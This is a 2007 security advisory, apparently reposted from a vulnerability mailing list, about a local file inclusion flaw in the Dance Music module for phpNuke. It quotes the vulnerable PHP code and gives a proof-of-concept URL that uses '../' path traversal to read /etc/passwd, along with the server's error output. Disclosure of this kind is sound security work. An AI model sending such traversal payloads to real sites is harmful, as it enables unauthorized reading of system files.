Security Advisory: [waraxe-2007-SA#054] - Local File Inclusion in Dance Music module for phpNuke

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  SimpGB version 1.46.02 Information Disclosure Vulnerability
  SimpNews version 2.41.03 Multiple Path Disclosure Vulnerabilities
  SimpGB version 1.46.02 Multiple Path Disclosure Vulnerabilities
  SimpGB version 1.46.02 Multiple XSS Attack Vulnerabilities

From: Janek Vind <come2waraxe_(at)_yahoo.com>
Date: 26.09.2007
Subject: [waraxe-2007-SA#054] - Local File Inclusion in Dance Music module for phpNuke

[waraxe-2007-SA#054] - Local File Inclusion in Dance Music module for phpNuke
============================================================================

Author: Janek Vind "waraxe"
Date: 25. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-54.html

Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.bestdownload.biz/modules.php?name=Downloads&d_op=viewdownloaddetai
ls
&lid=251&title=Dance%20Music%20for%20PHP-Nuke

Dance Music for PHP-Nuke
by MultiMedia http://www.multimedia.com.ro
and Nicolae Sfetcu http://www.sfetcu.com

Vulnerabilities: Local File Inclusion in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's take a peek at source code of "index.php":

------------>[source code]<------------

include("header.php");
...
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';
$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';
...
$page = $_GET['page'];
...
$pagename = $ACCEPT_FILE[$page];
if (!isSet($pagename)) $pagename = "index.html";
include("modules/Dance_Music-MM/$pagename");

------------>[/source code]<-----------

As we can see, "$ACCEPT_FILE" array is uninitialized, so we can insert there
arbitrary values from $_GET/$_POST/$_COOKIES parameters, if "register_globals"
is active.

Proof-of-concept test:

http://victim.com/modules.php?name=Dance_Music-MM&page=1
&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd

Warning: main() [function.main]: open_basedir restriction in effect.
File(./modules/Dance_Music-MM/../../../../../../../../../../../..
/etc/passwd
) is not within the allowed path(s): (/home/www/web32/)
in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154

So local file inclusion exists, but safe mode can make exploiting harder.

//-----> See ya soon and have a nice day ;) <-----//

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free Service manuals - http://service-manuals.waraxe.us/
User Manuals - http://user-manuals.waraxe.us/

---------------------------------- [ EOF ] ----------------------------